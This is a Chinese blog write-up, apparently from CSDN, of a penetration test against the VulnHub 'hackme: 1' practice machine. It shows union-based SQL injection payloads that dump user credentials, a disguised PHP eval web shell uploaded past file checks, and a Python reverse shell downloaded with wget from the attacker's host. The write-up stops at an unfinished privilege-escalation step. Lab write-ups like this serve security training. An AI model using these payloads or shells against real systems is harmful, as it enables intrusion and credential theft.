hackme-1靶机渗透详解

本文详细介绍了如何对一个名为HackMe的初学者级别靶机进行渗透测试。首先进行了信息收集,包括主机发现、端口扫描和目录扫描。接着,通过SQL注入漏洞找到管理员账户和密码。然后,利用文件上传漏洞上传图片马并建立反弹shell。最后,通过提权操作进一步控制系统,重点讨论了SQL注入和文件上传漏洞的利用技巧。
摘要由CSDN通过智能技术生成

靶机描述

靶机基本信息:

链接 hackme: 1 ~ VulnHubhackme: 1, made by x4bx54. Download & walkthrough links are available.https://www.vulnhub.com/entry/hackme-1,330/

“hackme”是一个初学者难度等级框。目标是通过web漏洞获得有限的权限访问,然后权限升级为root。

环境搭建

1、下载并导入靶机
打开vmware–文件–打开–hackme.ova
d664b39f3b332512902bc25873efae38.png
2、启动靶机
点击 ▶靶机,开启成功
3e227d20652cd863f63a23f575ee83ec.png

靶机渗透

一、信息收集

1、主机发现

arp-scan -l            #扫描同网段下存活主机

061df3686a4cc7c771013b59dcfa1d7b.png
2、扫描端口

nmap -T4 -sV -O -p 22,80 192.168.31.116

52710a4be6d45ef232f9237c483918be.png
3、扫描目录

dirsearch  -u 192.168.31.116

image.png

4、网站指纹识别 whatweb http://192.168.31.116
10454134ae1e5101815e530cd6798a43.png

二、漏洞挖掘

SQL注入

1、登录主页发现登录页面,而且还可以注册用户
e5b072bbe2c8f4e90456625fb769b77f.png
2、点击 Sign up now 注册用户admin 密码123456
bb248f423f028498e24043e6060ed85f.png
3、登录admin用户 单击search可以进行查看到很多的书名
9f78f80605ee081eb1f022f3730eea4e.png
4、验证sql注入

Windows OS' and 1=1#

4cdbddee4a69f19656086503d8ea362d.png

Windows OS' and 1=2#

f3abd4564cf842955e5c522fc1543fc8.png
:::info
由以上验证出此处存在字符型(单引号)sql注入
:::
5、判断字段数

Windows OS' order by 3#
Windows OS' order by 4#

edb6eca67110e8c4d81ad39c6afcf30c.png

9a1d5967d01f6507b755517cd14d5dfd.png

:::info
判断出来字段数是3个
:::

6、判断显示位置

-1' union select 1,2,3#

ab91fa264e1f8d096498824a1f114f4c.png

7、查看当前数据库位置

-1' union select database(),2,3#

bb0cf5a0d89b9c94cb544d4e0c7eb6fb.png

8、查看webapphacking库所有的表

-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#

9b29816783565cbb5fe7319b39d1b2d9.png

9、查看users表中所有的列

-1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#

6b3e1f702941daa128d1b524f2d3b0e2.png

10、查看表中user,password字段数据

-1' union select group_concat(user),group_concat(pasword),3 from users#

e2ef189f12f6844c39818635c5f8576c.png

11、将得到密码进行MD5解密
2ad2cc9634573cb54f414631b1d1cfb2.png

文件上传漏洞

1、使用superadmin用户登录 密码:Uncrackable
发现文件上传点
86ecf515cf68a4335560d50d97eec2bf.png
2、上传phpinfo()进行验证

制作假图片头 
GIF89a<?php phpinfo(); ?>

b43cbd6f76d6dd6e71e820c84a097afe.png

上传前先开启burp抓包
7c1f127f0cd83194f3951c1a046ddf7d.png
3、拦截-修改后缀,我们可以从回包中看出文件已将上传至文件夹
d21a5ae33bf30e175c6109cdf6a610fb.png
4、查看你目录扫描出的路径 http://192.168.31.116/uploads/phpinfo.php
d96ead6554fb7f3ac00f93e104b986a6.png
:::info
该上传点存在文件上传漏洞,并且假图片头与图片马均可以
:::

三、漏洞利用

1、制作图片马

 <?php @eval($_POST[shell]); ?>

4903b7ca61b34ad3b42f8dd8d8040461.png
2、同上面上传phpinfo.jpg一样,上传图片马
抓包–修改后缀–发送,可以看出上传成功
343ff5261b37bfc677de1a898a80a949.png
3、访问上传的图片马 http://192.168.31.116/uploads/b.php
fde68df6baddbbe5fe15e610a7538009.png
4、蚁剑连接成功
6e1a73581dea47f9fc7f1f9e712fb8c4.png
5、上传反弹shell脚本
将反弹shell放在网站根目录下,开启http服务 service apache2 start

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.31.100",1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])

32df930fcdabac8842e2ba0b8b41a97f.png
6、在蚁剑终端上下载 wget http://192.168.31.100/shell.py
a99f9cc326e167c46db23a88f36e7bf1.png
7、kali监听1234端口
c24c0cd89bd3b553a397bb971754e3cb.png
8、运行 python shell.py
b481d5e121ff18d50f15634e6f83f010.png
9、反弹shell成功
3ade0f10126ed4c65b27d9b868fbe1e1.png

四、 提权

1、识别所存在的用户 cat /etc/passwd | grep /bin/bash
04e30c4e6457df2831b35e46cdffe8b3.png
2、在/home/legacy路径下发现二进制文件touchmenot,执行二进制文件
c3a03ef1309a105ea7f0ba18f814e1a3.png

总结

此靶机重点在于SQL注入,爆出管理员用户及密码

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值